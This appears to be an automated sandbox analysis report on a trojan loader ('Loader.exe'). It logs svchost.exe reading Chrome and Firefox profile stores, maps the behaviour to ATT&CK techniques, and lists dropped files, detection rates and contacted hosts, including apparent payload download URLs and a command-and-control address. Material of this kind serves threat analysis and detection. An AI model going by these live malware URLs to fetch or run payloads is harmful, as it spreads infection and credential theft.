                    Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db
                    Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage
                    Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons Maskable
                    Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cache2\doomed
                    Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDB
                    Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb
                    Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads
                    Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials
                    Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons Monochrome
                    Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\yiaxs5ej.default
                    Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage
                    Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\15702f96-fbc1-4934-99bf-a9a7406c1be7
                    Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm
                    Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons Monochrome
                    Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js
                    Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\v6zchhhv.default-release\settings
                    Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext
                    Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB
                    Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache
                    Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State
                    Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption
                    Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons
                    Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons
                    Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak
                    Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Network
                    Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage
                    Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker
                    Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons
                    Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache
                    Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB
                    Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons Maskable
                    Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir
                    Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata
                    Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\v6zchhhv.default-release\settings\main\ms-language-packs\browser
                    Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings
                    Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb
                    Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources
                    Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings
                    Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\v6zchhhv.default-release
                    Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default
                    Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\v6zchhhv.default-release\settings\main\ms-language-packs
                    Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache\Cache_Data
                    Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                    Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons Maskable
                    Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb
                    Source: C:\Windows\System32\svchost.exeDirectory queried: C:\Users\user\Documents

                    Remote Access Functionality

                    Source: Yara match, File source: 00000010.00000003.2840379092.00000000003E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000010.00000002.2935727529.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 0000000F.00000002.2844728394.0000000001320000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                    Gather Victim Identity Information | 1 Scripting | Valid Accounts | 11 Windows Management Instrumentation | 1 Scripting | 1 DLL Side-Loading | 111 Disable or Modify Tools | 1 OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | 2 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
                    Credentials | Domains | Default Accounts | 2 Native API | 1 DLL Side-Loading | 1 Extra Window Memory Injection | 1 Deobfuscate/Decode Files or Information | 11 Input Capture | 13 File and Directory Discovery | Remote Desktop Protocol | 1 Browser Session Hijacking | 21 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
                    Email Addresses | DNS Server | Domain Accounts | 12 Command and Scripting Interpreter | Logon Script (Windows) | 1 Access Token Manipulation | 4 Obfuscated Files or Information | Security Account Manager | 117 System Information Discovery | SMB/Windows Admin Shares | 11 Data from Local System | 1 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact
                    Employee Names | Virtual Private Server | Local Accounts | 1 PowerShell | Login Hook | 311 Process Injection | 2 Software Packing | NTDS | 1 Query Registry | Distributed Component Object Model | 11 Input Capture | 3 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
                    Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 111 Security Software Discovery | SSH | 1 Clipboard Data | 14 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
                    Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Extra Window Memory Injection | Cached Domain Credentials | 1 Process Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                    DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 11 Masquerading | DCSync | 41 Virtualization/Sandbox Evasion | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                    Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 41 Virtualization/Sandbox Evasion | Proc Filesystem | 1 Application Window Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                    Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 Access Token Manipulation | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
                    IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 311 Process Injection | Network Sniffing | Network Service Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
                    [Behavior graph: ID 1579550, Sample: Loader.exe, Start date: 22/12/2024, Architecture: WINDOWS, Score: 100]

                    Source | Detection | Scanner | Label
                    Loader.exe | 28% | Virustotal |
                    Loader.exe | 24% | ReversingLabs | Win32.Trojan.Generic
                    Loader.exe | 100% | Avira | HEUR/AGEN.1312915
                    Source | Detection | Scanner
                    C:\Users\user\AppData\Local\CampaignHardwareLauncher\uninst.exe | 0% | ReversingLabs
                    C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\CampaignHardwareLauncher.exe | 3% | ReversingLabs
                    C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\JAWTAccessBridge-32.dll | 0% | ReversingLabs
                    C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\JAWTAccessBridge.dll | 0% | ReversingLabs
                    C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\JavaAccessBridge-32.dll | 0% | ReversingLabs
                    C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\JavaAccessBridge.dll | 0% | ReversingLabs
                    C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\WindowsAccessBridge-32.dll | 0% | ReversingLabs
                    C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\WindowsAccessBridge.dll | 0% | ReversingLabs
                    C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\awt.dll | 0% | ReversingLabs
                    C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\bci.dll | 0% | ReversingLabs
                    C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\client\jvm.dll | 0% | ReversingLabs
                    C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\dcpr.dll | 0% | ReversingLabs
                    C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\decora_sse.dll | 0% | ReversingLabs
                    C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\deploy.dll | 0% | ReversingLabs
                    C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\dt_shmem.dll | 0% | ReversingLabs
                    C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\dt_socket.dll | 0% | ReversingLabs
                    C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\dtplugin\deployJava1.dll | 0% | ReversingLabs
                    C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\dtplugin\npdeployJava1.dll | 0% | ReversingLabs
                    C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\eula.dll | 0% | ReversingLabs
                    C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\fontmanager.dll | 0% | ReversingLabs
                    C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\fxplugins.dll | 0% | ReversingLabs
                    C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\glass.dll | 0% | ReversingLabs
                    C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\glib-lite.dll | 0% | ReversingLabs
                    C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\gstreamer-lite.dll | 0% | ReversingLabs
                    C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\hprof.dll | 0% | ReversingLabs
                    C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\instrument.dll | 0% | ReversingLabs
                    C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\j2pcsc.dll | 0% | ReversingLabs
                    C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\j2pkcs11.dll | 0% | ReversingLabs
                    C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\jaas_nt.dll | 0% | ReversingLabs
                    C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\jabswitch.exe | 0% | ReversingLabs
                    C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\java-rmi.exe | 0% | ReversingLabs
                    C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\java.dll | 0% | ReversingLabs
                    C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\java.exe | 0% | ReversingLabs
                    C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\java_crw_demo.dll | 0% | ReversingLabs
                    C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javacpl.cpl | 0% | ReversingLabs
                    C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javacpl.exe | 0% | ReversingLabs
                    C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javafx_font.dll | 0% | ReversingLabs
                    C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javafx_font_t2k.dll | 0% | ReversingLabs
                    C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javafx_iio.dll | 0% | ReversingLabs
                    C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exe | 0% | ReversingLabs
                    C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaws.exe | 0% | ReversingLabs
                    C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\jawt.dll | 0% | ReversingLabs
                    C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\jdwp.dll | 0% | ReversingLabs
                    C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\jfr.dll | 0% | ReversingLabs
                    C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\jfxmedia.dll | 0% | ReversingLabs
                    C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\jfxwebkit.dll | 0% | ReversingLabs
                    C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\jjs.exe | 0% | ReversingLabs
                    C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\jli.dll | 0% | ReversingLabs
                    C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\jp2iexp.dll | 0% | ReversingLabs
                    C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\jp2launcher.exe | 0% | ReversingLabs
                    C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\jp2native.dll | 0% | ReversingLabs
                    C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\jp2ssv.dll | 0% | ReversingLabs
                    C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\jpeg.dll | 0% | ReversingLabs
                    C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\jsdt.dll | 0% | ReversingLabs
                    C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\jsound.dll | 0% | ReversingLabs
                    C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\jsoundds.dll | 0% | ReversingLabs
                    C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\kcms.dll | 0% | ReversingLabs
                    C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\keytool.exe | 0% | ReversingLabs
                    C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\kinit.exe | 0% | ReversingLabs
                    C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\klist.exe | 0% | ReversingLabs
                    C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\ktab.exe | 0% | ReversingLabs
                    C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\lcms.dll | 0% | ReversingLabs
                    C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\management.dll | 0% | ReversingLabs
                    C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\mlib_image.dll | 0% | ReversingLabs
                    C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\msvcp120.dll | 0% | ReversingLabs
                    No Antivirus matches
                    No Antivirus matches
                    No Antivirus matches
                    Name | IP | Active | Malicious | Antivirus Detection | Reputation
                    chrome.cloudflare-dns.com | 162.159.61.3 | true | false | | high
                    gbg1.ntp.netnod.se | 194.58.203.20 | true | false | | unknown
                    x.ns.gin.ntt.net | 129.250.35.250 | true | false | | high
                    ntp1.net.berkeley.edu | 169.229.128.134 | true | false | | high
                    ntp.time.nl | 94.198.159.10 | true | false | | high
                    ntp.time.in.ua | 62.149.0.30 | true | false | | high
                    erdogansigorta.com | 5.2.81.126 | true | false | | unknown
                    ntp1.hetzner.de | 213.239.239.164 | true | false | | high
                    gbg1.ntp.se | unknown | unknown | false | | unknown
                    Name | Malicious | Antivirus Detection | Reputation
                    http://77.238.245.43/tamus/medicalanalysispro.zip | false | | unknown
                    https://erdogansigorta.com/temp/Nomrwfj.mp4 | false | | unknown
                    https://104.37.175.218:7982/da03ab84e7f8187e6/v3iuaiea.tsf2o | true | | unknown
                                                                                                  http://java.sun.com/xml/dom/properties/javaw.exe, 00000003.00000003.2231217783.0000000015AE2000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.3001038964.0000000015AD9000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2232527015.0000000015AEB000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2228038429.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2335885806.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.3003103430.0000000015AD9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    http://apache.org/xml/properties/internal/stax-entity-resolverjavaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      http://apache.org/xml/features/namespacesqjavaw.exe, javaw.exe, 00000003.00000003.2228038429.00000000159BB000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.3001038964.00000000159BE000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2335885806.00000000159BB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        http://apache.org/xml/features/xinclude/fixup-base-uris6javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          http://javax.xml.XMLConstants/feature/secure-processingjavaw.exe, javaw.exe, 00000003.00000003.2231217783.0000000015AE2000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.3001038964.0000000015AD9000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2232527015.0000000015AEB000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2228038429.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2335885806.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.3003103430.0000000015AD9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            unknown
                                                                                                            http://apache.org/xml/features/xinclude/fixup-base-urisjavaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              http://apache.org/xml/properties/schema/external-noNamespaceSchemaLocationjavaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                http://www.oracle.com/technetwork/java/javafx/index.htmljavaw.exe, 00000003.00000002.4539258471.000000000ACF5000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4545639440.0000000016A16000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  http://apache.org/xml/properties/internal/error-reporterjavaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    http://apache.org/xml/properties/internal/namespace-contextjavaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      http://apache.org/xml/features/validation/schema:javaw.exe, 00000003.00000003.2336673647.00000000152CE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        http://apache.org/xml/features/warn-on-duplicate-entitydefjavaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          http://xml.org/sax/features/namespace-prefixes1javaw.exe, 00000003.00000003.2336673647.00000000152CE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            unknown
                                                                                                                            http://www.slf4j.org/codes.html#multiple_bindingsjavaw.exe, 00000003.00000002.4545973178.0000000016CA1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              http://apache.org/xml/properties/schema/external-schemaLocationJjavaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                http://javax.xml.XMLConstants/property/accessExternalSchemajavaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2336673647.00000000152CE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  unknown
                                                                                                                                  http://apache.org/xml/features/nonvalidating/load-external-dtdAjavaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    http://apache.org/xml/features/include-commentsjavaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2336673647.00000000152CE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      http://apache.org/xml/features/scanner/notify-char-refsjavaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        http://javax.xml.transform.sax.SAXResult/feature#javaw.exe, javaw.exe, 00000003.00000003.2231217783.0000000015AE2000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.3001038964.0000000015AD9000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2232527015.0000000015AEB000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2228038429.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2335885806.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.3003103430.0000000015AD9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          unknown
                                                                                                                                          http://apache.org/xml/properties/internal/symbol-table6javaw.exe, 00000003.00000003.2336673647.00000000152CE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            http://java.sun.com/xml/stream/properties/report-cdata-eventjavaw.exe, 00000003.00000003.2231217783.0000000015AE2000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.3001038964.0000000015AD9000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2232527015.0000000015AEB000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2228038429.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4539258471.000000000AA94000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2335885806.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.3003103430.0000000015AD9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              http://javax.xml.XMLConstants/property/accessExternalStylesheet8javaw.exe, 00000003.00000003.2231217783.0000000015AE2000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.3001038964.0000000015AD9000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2232527015.0000000015AEB000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2228038429.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2335885806.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.3003103430.0000000015AD9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                unknown
                                                                                                                                                http://apache.org/xml/features/scanner/notify-char-refs:javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  http://java.sun.com/xml/schema/features/report-ignored-element-content-whitespace3javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    http://apache.org/xml/properties/dom/current-element-node7javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      http://bugreport.sun.com/bugreport/java.vendor.url.bughttp://java.oracle.com/java.vendor.urljava.venjavaw.exe, 00000003.00000002.4552068701.000000006BF13000.00000002.00000001.01000000.0000000B.sdmpfalse
                                                                                                                                                        unknown
